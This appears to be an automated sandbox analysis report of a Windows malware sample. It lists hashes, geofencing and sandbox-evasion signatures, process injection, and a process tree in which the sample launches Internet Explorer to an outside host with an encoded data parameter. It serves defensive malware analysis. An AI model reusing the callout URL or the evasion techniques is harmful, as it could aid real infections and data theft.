Analysis
-
max time kernel
153s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
29/12/2023, 22:44
General
-
Target
05f8cceb91ad96e3fec180ad4fc6c317.exe
-
Size
158KB
-
MD5
05f8cceb91ad96e3fec180ad4fc6c317
-
SHA1
5ef7ee929bbd7b44b365302391ae2e1fedc04b97
-
SHA256
c26dcbf785274d324bd3d52d5cca862c0b4eb3f8e52ea2d28730f468fc0a61ed
-
SHA512
602e4831a0ef7eece355ce911c2de1382b2e5bde06e3af9eaa23ade68c28bc44d21842e36d1a8b97eb78c08195090318836486b20c7a54809a89192db34a644e
-
SSDEEP
3072:fwABjrG3Vi/cOBLUsmyi4AHhmTdI3wIe0HRDLVT/sOrVzzXZ:oGjrUVecOJUsmdmdI3vPRDLp/s0zJ
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
UPX packed file 5 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in System32 directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies Internet Explorer settings 1 TTPs 23 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\05f8cceb91ad96e3fec180ad4fc6c317.exe"C:\Users\Admin\AppData\Local\Temp\05f8cceb91ad96e3fec180ad4fc6c317.exe"1⤵
- Checks computer location settings
- Drops file in System32 directory
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\f3e072290cb0045dcc47ce6aa23776f1.bat2⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://wl.cabolar.com/v3062/repins.jpg?msg=vr4m1h4euM9XBMKQxff94jaTxK7ZuQ%2BT%2BkjGD%2FVjSRqUysKPW6VIkics5oniUp9ldsunt43lwIUB9E%2Fy%2FCnbM7Q%2B13dcyHLNRCUblgu1xOBkzuQiLkgtxxIUqlUTwIIk2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2132 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
209B
MD502b44e60928967f0521022c0863959fc
SHA127e670b44c943892ab00b796f2eb5985b6cf6e3e
SHA2563f2025a624c38be13b3b052eb85326e7237d0cfab644be484e07b1e90b6b312f
SHA512cf53ed2de7439763dd183ecdc3b3bea4db35122a8847baeaa9a69149273b9fa1d97c2882b492e4ed125a499e89925c56f493516dadb8f67ad9d9d79b189ce000
-
Filesize
212KB
-
Filesize
212KB
-
Filesize
212KB
-
Filesize
212KB
-
Filesize
212KB